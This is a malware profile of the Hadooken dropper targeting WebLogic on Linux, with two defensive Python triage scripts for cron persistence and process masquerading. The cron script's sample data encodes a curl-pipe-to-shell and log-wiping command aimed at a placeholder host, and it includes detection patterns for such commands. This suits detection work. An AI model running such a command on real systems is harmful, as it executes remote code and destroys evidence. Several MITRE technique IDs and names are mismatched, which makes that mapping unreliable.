Hadooken
Type of Malware | Dropper
Date of Initial Activity | 2024
Motivation | Financial Gain
Attack Vectors | Credential-Based Attacks
Targeted Systems | Linux
Overview
The Hadooken malware is a sophisticated threat that has recently come to light, primarily targeting WebLogic servers running on Linux-based systems. Discovered by Aqua Nautilus researchers, this malware employs a multi-stage attack process that leverages common vulnerabilities, misconfigurations, and weak passwords to gain access to systems. Once the attacker infiltrates the WebLogic server, the malware executes a series of malicious actions, including the deployment of a cryptominer and the introduction of the Tsunami malware. The name “Hadooken” itself is likely a reference to the powerful attack move in the Street Fighter series, symbolizing the malware’s aggressive nature and its potential to wreak havoc on targeted systems.
WebLogic, an enterprise-level Java EE application server developed by Oracle, is widely used in critical business applications, including banking and e-commerce. Due to its widespread adoption in large-scale enterprises, WebLogic servers are frequently targeted by cybercriminals. In many cases, attackers exploit known vulnerabilities or misconfigurations, such as weak admin credentials or exposed consoles, to gain unauthorized access and execute remote code. Hadooken takes advantage of these weaknesses by leveraging brute force techniques and launching a chain of attack mechanisms aimed at compromising the server’s resources and spreading further within the network.
How they operate
Initial Infection and Execution
Hadooken is typically introduced through the exploitation of a vulnerability in Oracle WebLogic servers, most notably the CVE-2020-14882 flaw. This critical vulnerability allows remote code execution via maliciously crafted HTTP requests. Once the attackers gain access to a vulnerable WebLogic server, they can deploy a series of malicious scripts to further compromise the system. The malware commonly uses PowerShell, Python, and Unix shell scripts to execute commands remotely. For example, it leverages a PowerShell script (b.ps1) that distributes secondary payloads, such as Mallox ransomware, to other compromised machines.
The malware’s versatility lies in its ability to switch between different scripting languages, making detection and analysis more challenging. This multi-script deployment is not only used to execute payloads but also to communicate with the command and control (C2) servers, ensuring that the malware can receive updates or new instructions in real time.
Persistence and Privilege Escalation
One of the key aspects of the Hadooken malware’s functionality is its ability to maintain a foothold within compromised systems. It achieves this persistence through various mechanisms, including the use of cron jobs. By setting up scheduled tasks, Hadooken ensures that it is re-executed at specific intervals (e.g., hourly or daily). This persistence mechanism is crucial for long-term campaigns, as it allows the malware to survive system reboots and other potential cleanup attempts.
Privilege escalation is another critical part of Hadooken’s operational strategy. The malware often exploits existing vulnerabilities to escalate its privileges within the compromised environment. This allows it to gain deeper access to systems, potentially bypassing restrictive access controls and escalating its ability to execute malicious activities across an organization’s infrastructure.
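A defender-side check for the cron persistence described above. It triages crontab lines for scheduled re-execution of commands that run from /tmp-style directories or are wrapped in base64, and it decodes those blobs so that download-and-pipe-to-shell and log-wiping commands hidden inside them are surfaced too. This is an added example, not code from the page or from Aqua Nautilus; the crontab, the 203.0.113.10 address and the paths are constructed placeholders.

```python
"""Triage crontab lines for Hadooken-style persistence: scheduled re-execution of
base64-wrapped or /tmp-resident commands, and log wiping hidden inside the blob."""
import base64
import re

CRON_RE = re.compile(r"^\s*(@\w+|(\S+\s+){5})(?P<cmd>.+)$")
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
INDICATORS = {
    "base64_decode": re.compile(r"base64\s+(-d|--decode)\b"),
    "pipe_to_shell": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
    "tmp_exec": re.compile(r"(^|[\s;&|])/(tmp|var/tmp|dev/shm)/"),
    "log_wipe": re.compile(r"\brm\b.*/var/log/"),
}

def decode_blobs(cmd):
    """Return the plaintext of every base64 run in cmd that decodes to readable text."""
    out = []
    for m in B64_RE.finditer(cmd):
        try:
            text = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not really base64, or binary: leave it for manual review
        if all(ch.isprintable() or ch in "\n\t" for ch in text):
            out.append(text)
    return out

def triage(lines):
    """Return (command, indicator names, decoded blobs) for each suspicious entry."""
    findings = []
    for line in lines:
        m = CRON_RE.match(line)
        if line.lstrip().startswith("#") or not m:
            continue
        cmd = m.group("cmd").strip()
        hits = [k for k, rx in INDICATORS.items() if rx.search(cmd)]
        blobs = decode_blobs(cmd)
        for b in blobs:  # the obfuscation is one layer deep: scan what it hides too
            hits += [f"decoded:{k}" for k, rx in INDICATORS.items() if rx.search(b)]
        if hits:
            findings.append((cmd, hits, blobs))
    return findings

# Constructed sample crontab; the host and paths are placeholders, not real IoCs.
PAYLOAD = "curl -s http://203.0.113.10/c | sh; rm -f /var/log/wtmp"
BLOB = base64.b64encode(PAYLOAD.encode()).decode()
SAMPLE = [
    "0 3 * * * /usr/bin/logrotate /etc/logrotate.conf",
    f"0 * * * * echo {BLOB} | base64 -d | bash",
    "@daily /tmp/.x/c >/dev/null 2>&1",
]
```

On a live host, feed it the lines of every file under /etc/cron* and /var/spool/cron; the logrotate entry is there to show that an ordinary scheduled job produces no finding.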
Defense Evasion and Obfuscation Techniques
Hadooken employs a range of evasion techniques to avoid detection by traditional security measures, such as antivirus software or intrusion detection systems. One of the key evasion strategies is obfuscation. The malware utilizes base64 encoding to obfuscate its payloads, making it difficult for security systems to identify malicious code through signature-based detection methods. In addition, Hadooken employs masquerading tactics, where it disguises its malicious processes as legitimate system tasks. For example, it often uses names like -bash or -java, making it appear as though the processes are benign when in fact they are executing harmful instructions.
The malware also focuses on removing traces of its presence by deleting logs and other artifacts that might indicate malicious activity. This tactic is part of a broader indicator removal on host strategy, aimed at erasing evidence of the attack to delay detection and forensic analysis. Such techniques allow the attackers to maintain control over the compromised systems without being noticed for extended periods.
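The masquerading described above is visible from the host side because the kernel records which binary a process is actually running, independently of the name the process presents. The check below, an added example rather than code from the page or from Aqua Nautilus, compares argv[0] against /proc/<pid>/exe and also flags binaries executed from world-writable scratch directories or unlinked after launch; it generalises beyond -bash and -java to any claimed name. The sample process records are constructed.

```python
"""Triage Linux processes whose argv[0] claims to be -bash or -java but whose
on-disk binary (the kernel's /proc/<pid>/exe link) tells a different story."""
import os
from dataclasses import dataclass

SUSPECT_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

@dataclass
class Proc:
    pid: int
    argv0: str  # first NUL-separated field of /proc/<pid>/cmdline
    exe: str    # target of the /proc/<pid>/exe symlink

def collect_procs():
    """Snapshot a live host; reading another user's exe link needs root or ptrace rights."""
    procs = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        try:
            with open(f"/proc/{name}/cmdline", "rb") as fh:
                argv0 = fh.read().split(b"\0", 1)[0].decode(errors="replace")
            exe = os.readlink(f"/proc/{name}/exe")
        except OSError:
            continue  # exited mid-walk or permission denied
        procs.append(Proc(int(name), argv0, exe))
    return procs

def is_masquerading(p):
    # A leading '-' is how a genuine login shell announces itself, so "-bash" alone
    # proves nothing; the signal is a mismatch between the claimed name and the binary.
    claimed = os.path.basename(p.argv0.lstrip("-"))
    actual = os.path.basename(p.exe.replace(" (deleted)", ""))
    if not claimed:
        return False  # kernel threads and zombies have an empty cmdline
    # startswith() tolerates resolved interpreter names such as python3 -> python3.11
    return (not actual.startswith(claimed)
            or p.exe.startswith(SUSPECT_DIRS)
            or p.exe.endswith(" (deleted)"))

def find_masquerading(procs):
    return [p for p in procs if is_masquerading(p)]

# Constructed sample records, not a capture from a real host.
SAMPLE = [
    Proc(1201, "-bash", "/usr/bin/bash"),          # real login shell: benign
    Proc(1340, "-java", "/tmp/.x/miner"),          # claims java, runs from /tmp
    Proc(1355, "-bash", "/var/tmp/c (deleted)"),   # binary unlinked after exec
    Proc(1400, "java", "/usr/lib/jvm/bin/java"),   # ordinary JVM: benign
]
```

On a live host run find_masquerading(collect_procs()); treat the result as a triage list, since a name that differs from its resolved binary (sh versus dash, for instance) is a prompt to look, not proof of compromise.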
Lateral Movement and Data Impact
Once it has established persistence and elevated its privileges, Hadooken attempts to spread laterally within the network. This is often done by leveraging SSH hijacking or exploiting weak credentials to gain access to other systems on the network. The malware can scan for and exploit poorly configured SSH keys or brute force login attempts, allowing it to propagate to other machines and maximize the impact of the attack.
In terms of impact, Hadooken’s primary objective is often to hijack system resources for cryptocurrency mining. This is achieved by deploying a cryptominer that consumes system resources to mine digital currencies, draining valuable computing power and potentially leading to performance degradation and system instability. Additionally, the malware’s infrastructure has been observed to support the deployment of ransomware payloads such as RHOMBUS or NoEscape, potentially encrypting valuable data on infected machines and demanding ransom payments from victims.
Conclusion
The Hadooken malware exemplifies the sophistication of modern cyberattacks. By leveraging a combination of exploitation, obfuscation, persistence, and lateral movement techniques, it poses a significant threat to enterprise networks. Understanding the technical operation of Hadooken provides security teams with the necessary insights to detect, mitigate, and ultimately defend against this evolving malware. The use of advanced evasion tactics, coupled with its ability to target both Windows and Unix-based systems, underscores the growing complexity of contemporary cyber threats and the need for robust, multi-layered security defenses.
MITRE Tactics and Techniques
1. Initial Access
Exploit Public-Facing Application (T1190): The attackers exploit vulnerabilities in Oracle WebLogic servers, such as weak credentials, to gain access and execute malicious code.
2. Execution
Command and Scripting Interpreter – Unix Shell (T1059.004): The malware uses shell scripts (e.g., the ‘c’ shell script) to execute commands and carry out malicious activities.
Command and Scripting Interpreter – Python (T1059.003): The ‘y’ Python script is used to download and execute the Hadooken malware.
Command and Scripting Interpreter – PowerShell (T1059.001): PowerShell script ‘b.ps1’ is used to distribute other malware (e.g., Mallox ransomware) on Windows systems.
3. Persistence
Create or Modify System Process – Cron (T1053.003): Hadooken creates cron jobs to ensure persistence by executing malicious payloads at regular intervals (e.g., hourly, daily, weekly).
4. Privilege Escalation
Exploitation for Privilege Escalation (T1068): The malware may exploit vulnerabilities or misconfigurations to escalate privileges during its execution.
5. Defense Evasion
Masquerading – Task or Service (T1036.005): The malware masquerades its cryptominer as legitimate system processes by using familiar names like ‘-bash’ or ‘-java’.
Obfuscated Files or Information (T1027): The malware uses base64 encoding to obfuscate its payloads and avoid detection.
Indicator Removal on Host (T1070): The malware deletes logs to erase traces of its malicious activity and avoid detection.
6. Credential Access
Brute Force (T1110.001): The attackers use brute force techniques to guess weak passwords and gain access to the WebLogic administration console.
7. Lateral Movement
Remote Service Session Hijacking – SSH Hijacking (T1571): The shell script attempts to iterate through SSH keys and credentials to move laterally and spread the malware across the network.
8. Impact
Resource Hijacking (T1496): The malware deploys a cryptominer to hijack system resources for cryptocurrency mining.
Data Encrypted for Impact (T1486): While not explicitly observed in this case, the potential for ransomware deployment, such as RHOMBUS or NoEscape, suggests that the attackers may encrypt data for impact in future stages of the attack.